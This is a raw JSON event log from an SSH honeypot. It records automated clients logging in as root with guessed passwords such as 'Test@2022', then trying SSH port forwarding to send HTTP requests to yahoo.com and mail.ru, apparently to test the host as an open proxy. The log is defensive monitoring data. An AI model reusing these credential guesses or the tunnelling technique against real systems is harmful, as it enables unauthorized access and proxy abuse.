{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.632618Z","src_ip":"77.83.207.83","session":"d2bb3489e9ad"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.684606Z","src_ip":"77.83.207.83","session":"d2bb3489e9ad"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14668,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0939775a04c","protocol":"ssh","message":"New connection: 77.83.207.83:14668 (1.2.3.4:22) [session: d0939775a04c]","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.733776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.734822Z","src_ip":"77.83.207.83","session":"d0939775a04c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.784888Z","src_ip":"77.83.207.83","session":"d0939775a04c"}
{"eventid":"cowrie.login.success","username":"root","password":"OABmg","message":"login attempt [root/OABmg] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.951389Z","src_ip":"212.227.125.160","session":"1a31b65833f4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.034536Z","src_ip":"77.83.207.83","session":"d0939775a04c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15417,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15417","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.085544Z","session":"d0939775a04c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.135670Z","src_ip":"77.83.207.83","session":"d0939775a04c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10869,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:10869","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.276404Z","session":"d0939775a04c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.326714Z","src_ip":"77.83.207.83","session":"d0939775a04c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":6169,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6169","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.468502Z","session":"d0939775a04c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.518690Z","src_ip":"77.83.207.83","session":"d0939775a04c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.570260Z","src_ip":"77.83.207.83","session":"d0939775a04c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14778,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dfada396a66","protocol":"ssh","message":"New connection: 77.83.207.83:14778 (1.2.3.4:22) [session: 8dfada396a66]","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.619137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.620022Z","src_ip":"77.83.207.83","session":"8dfada396a66"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.670250Z","src_ip":"77.83.207.83","session":"8dfada396a66"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.920123Z","src_ip":"77.83.207.83","session":"8dfada396a66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2322,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2322","sensor":"my-vps","timestamp":"2025-08-31T03:50:16.971163Z","session":"8dfada396a66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.021297Z","src_ip":"77.83.207.83","session":"8dfada396a66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":18985,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18985","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.164500Z","session":"8dfada396a66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.214851Z","src_ip":"77.83.207.83","session":"8dfada396a66"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":9094,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:9094","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.356331Z","session":"8dfada396a66"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.406562Z","src_ip":"77.83.207.83","session":"8dfada396a66"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.457278Z","src_ip":"77.83.207.83","session":"8dfada396a66"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14883,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f833d21d0d1","protocol":"ssh","message":"New connection: 77.83.207.83:14883 (1.2.3.4:22) [session: 8f833d21d0d1]","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.506385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.517197Z","src_ip":"77.83.207.83","session":"8f833d21d0d1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.557117Z","src_ip":"77.83.207.83","session":"8f833d21d0d1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.809846Z","src_ip":"77.83.207.83","session":"8f833d21d0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31810,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31810","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.861512Z","session":"8f833d21d0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:17.912312Z","src_ip":"77.83.207.83","session":"8f833d21d0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24468,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24468","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.057066Z","session":"8f833d21d0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.107873Z","src_ip":"77.83.207.83","session":"8f833d21d0d1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":6237,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6237","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.252933Z","session":"8f833d21d0d1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.303543Z","src_ip":"77.83.207.83","session":"8f833d21d0d1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.355330Z","src_ip":"77.83.207.83","session":"8f833d21d0d1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15012,"dst_ip":"1.2.3.4","dst_port":22,"session":"8aebac40e863","protocol":"ssh","message":"New connection: 77.83.207.83:15012 (1.2.3.4:22) [session: 8aebac40e863]","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.405381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.406368Z","src_ip":"77.83.207.83","session":"8aebac40e863"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.456620Z","src_ip":"77.83.207.83","session":"8aebac40e863"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.707104Z","src_ip":"77.83.207.83","session":"8aebac40e863"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32289,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32289","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.758257Z","session":"8aebac40e863"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:18.808803Z","src_ip":"77.83.207.83","session":"8aebac40e863"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:50:19.304985Z","src_ip":"212.227.125.160","session":"1a31b65833f4"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.305784Z","src_ip":"212.227.125.160","session":"1a31b65833f4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9896,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9896","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.308091Z","session":"8aebac40e863"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.358776Z","src_ip":"77.83.207.83","session":"8aebac40e863"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":2535,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:2535","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.500549Z","session":"8aebac40e863"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.550921Z","src_ip":"77.83.207.83","session":"8aebac40e863"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.602229Z","src_ip":"77.83.207.83","session":"8aebac40e863"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":15206,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a0d6f5c2df6","protocol":"ssh","message":"New connection: 77.83.207.83:15206 (1.2.3.4:22) [session: 2a0d6f5c2df6]","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.652404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.653109Z","src_ip":"77.83.207.83","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.705156Z","src_ip":"77.83.207.83","session":"2a0d6f5c2df6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:19.960517Z","src_ip":"77.83.207.83","session":"2a0d6f5c2df6"}
